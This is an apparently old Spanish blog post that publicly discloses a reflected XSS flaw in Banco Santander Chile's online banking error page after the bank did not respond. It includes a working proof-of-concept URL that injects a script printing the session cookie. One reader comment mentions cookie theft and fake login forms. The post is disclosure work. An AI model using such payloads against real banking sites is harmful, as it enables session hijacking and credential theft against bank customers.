Vulnerabilidad en banca de personas del Banco Santander

Información Importante Sobre el Contenido

Estas accediendo al contenido antiguo del blog. Este artículo "Vulnerabilidad en banca de personas del Banco Santander" es de dominio público y no será mantenido a futuro. Cualquier error o problema acerca del contenido por favor contactate conmigo desde la sección contacto.

Luego de intentar comunicarme por varias formas con algun encargado del sitio o algun responsable, y obteniendo respuestas negativas o en algunos casos sin respuestas, haré publica la vulnerabilidad que afecta al sistema de Banca de Personas del Banco Santander, fallo que tambien podría afectar a la Banca Empresas.

Quizá no es una vulnerabilidad tan critica ni tampoco significa el fin del mundo, pero creo que alguien con los suficientes conocimientos podría aprovecharse y explotarla. Coresponde a una típica y tonta vulnerabilidad XSS que permite, para variar, inyección de código javascript que nos permitirá el robo de credenciales o bien redireccionar la información del usuario a algun sitio maligno, usando la confianza del servidor seguro de Santander.

El bug se encuentra en el script ASP que muestra los errores del sitio

https://www.santander.cl/transa/errores/PagError.asp?titerror=0&codigo=Visualizaci%F3n%20de%20Imagenes&url=&msgerror=

Esta vulnerabilidad se limita a que el usuario debe tener iniciada la sesión.

Prueba de concepto (PoC)

La URL para explotar esta vulnerabilidad es la siguiente:

https://www.santander.cl/transa/errores/PagError.asp?titerror=0&codigo=Visualizaci%F3n%20de%20Imagenes&url=&msgerror=%3Cb%3EaaaLamentablemente%20la%20imagen%20del%20documento%20que%20eligi%F3%20no%20se%20encuen%3Cscript%3Ealert%28document.cookie%29%3C/script%3Etra%20en%20nuestras%20bases%20de%20datos%3Cbr%3E%3Cbr%3EAgradecemos%20su%20comprensi%F3n.%3C!--%20Ver%20Boleta%20ERROR%20DEFINIDO:%20[10:No%20se%20Encontraron%20registros%20para%20la%20b%FAsqueda%20realizada]--%3E&boton=CL&tema=Obtenci%F3n%20de%20Imagen

Información Importante Sobre el Contenido

Estas accediendo al contenido antiguo del blog. Este artículo "Vulnerabilidad en banca de personas del Banco Santander" es de dominio público y no será mantenido a futuro. Cualquier error o problema acerca del contenido por favor contactate conmigo desde la sección contacto.

1 comentario

  1. Parece mentira que la gente siga considerando los XSS como vulnerabilidades de segunda. Si que es cierto que con ellas no se puede realizar un acceso directo al servidor pero si que se puede engañar a los usuarios bien robandole las cookies o añadiendo un formulario falso de login si bien, en este caso, al ser un servidor seguro (https) es más dificil añadir scripts externos (pero no imposible)

    Confio que el santander lo arregle pronto aunque creo que pasan del tema.

Los comentarios están cerrados.